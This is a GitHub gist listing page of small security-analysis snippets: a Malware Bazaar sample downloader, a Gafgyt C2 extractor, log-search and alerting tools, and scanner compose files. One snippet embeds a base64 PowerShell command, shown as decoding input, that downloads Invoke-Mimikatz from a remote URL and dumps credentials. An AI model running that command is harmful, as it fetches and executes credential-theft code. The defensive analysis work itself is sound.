BoredHackerBlog’s gists

BoredHackerBlog / abusech_malware_bazaar_hourly.sh

Created August 10, 2022 23:24

download and analyze abuse.ch malware bazaar hourly files

	#!/bin/bash
	# prolly use cron w/ '10 * * * *' so it runs every hour, at hour:10mins

	hourlyfile=$(date -u --date="1 hour ago" +%Y-%m-%d-%H).zip
	wget https://datalake.abuse.ch/malware-bazaar/hourly/$hourlyfile -O /tmp/hourly.zip
	unzip -P infected -o /tmp/hourly.zip -d /tmp/hourly_files
	# do stuff with the files
	file /tmp/hourly_files/* >> /tmp/file_out.txt
	# do stuff with the files
	rm -rf /tmp/hourly_files /tmp/hourly.zip

BoredHackerBlog / extractor.py

Created July 23, 2022 23:22

Gafgyt/qbot c2 extractor

	#Gafgyt/qbot C2 extractor
	#https://bazaar.abuse.ch/browse/signature/Gafgyt/
	#The file needs to be unpacked (usually packed with upx)
	import re
	import sys

	# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
	ipv4_zero = b"\x00(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?):(\d{0,5})\x00"
	ipv4_e9 = b"\xe9(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?):(\d{0,5})\x00"

BoredHackerBlog / msticpy_b64_unpack.py

Last active May 17, 2022 01:46

base64 command line arg decoding with msticpy

	from msticpy.nbtools import *
	from msticpy.sectools import *

	command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="

	out = base64.unpack(command)

	print(out[1]['decoded_string'][0])

	# it should print

BoredHackerBlog / pyspark_search.py

Last active April 30, 2022 01:58

apache spark / pyspark eve.json search

	In [1]: from pyspark.sql import SparkSession

	In [2]: spark = SparkSession \
	...: .builder \
	...: .appName("example") \
	...: .getOrCreate()
	22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
	22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
	Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
	Setting default log level to "WARN".

BoredHackerBlog / graph_proc.py

Created February 1, 2022 14:49

process graph using graphviz and python

	from graphviz import Digraph

	process_data = []
	process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"})
	process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"})
	process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"})
	process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"})
	process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"})

	def graph_process(jsonarray, pid_key, ppid_key, label_key):

BoredHackerBlog / ghactions_docker_build.yaml

Last active February 1, 2022 03:18

github actions for docker containers

	name: build and upload container

	on:
	push:
	branches: [ main ]

	jobs:
	build:
	runs-on: ubuntu-latest

BoredHackerBlog / set_token.py

Created January 23, 2022 19:30

humio stdin testing

	import requests
	from time import sleep

	while True:
	try:
	if requests.get("http://localhost:8080").status_code == 200:
	break
	else:
	sleep(5)
	except:

BoredHackerBlog / docker-compose.yaml

Created January 9, 2022 19:31

openvas docker-compose

	#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
	#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
	version: "3"
	services:
	openvas:
	ports:
	- "8080:9392"
	environment:
	- "PASSWORD=admin"
	- "USERNAME=admin"

BoredHackerBlog / docker-compose.yaml

Last active August 31, 2025 13:41

grafana loki docker-compose file and vector settings

BoredHackerBlog / alert_app.py

Created September 18, 2021 23:00

humio to og alert

	from flask import request
	from flask import Flask
	import opsgenie_sdk

	app = Flask(__name__)

	og = opsgenie_sdk.configuration.Configuration()
	og.api_key['Authorization'] = ""
	og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
	og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)

boredhackerblog BoredHackerBlog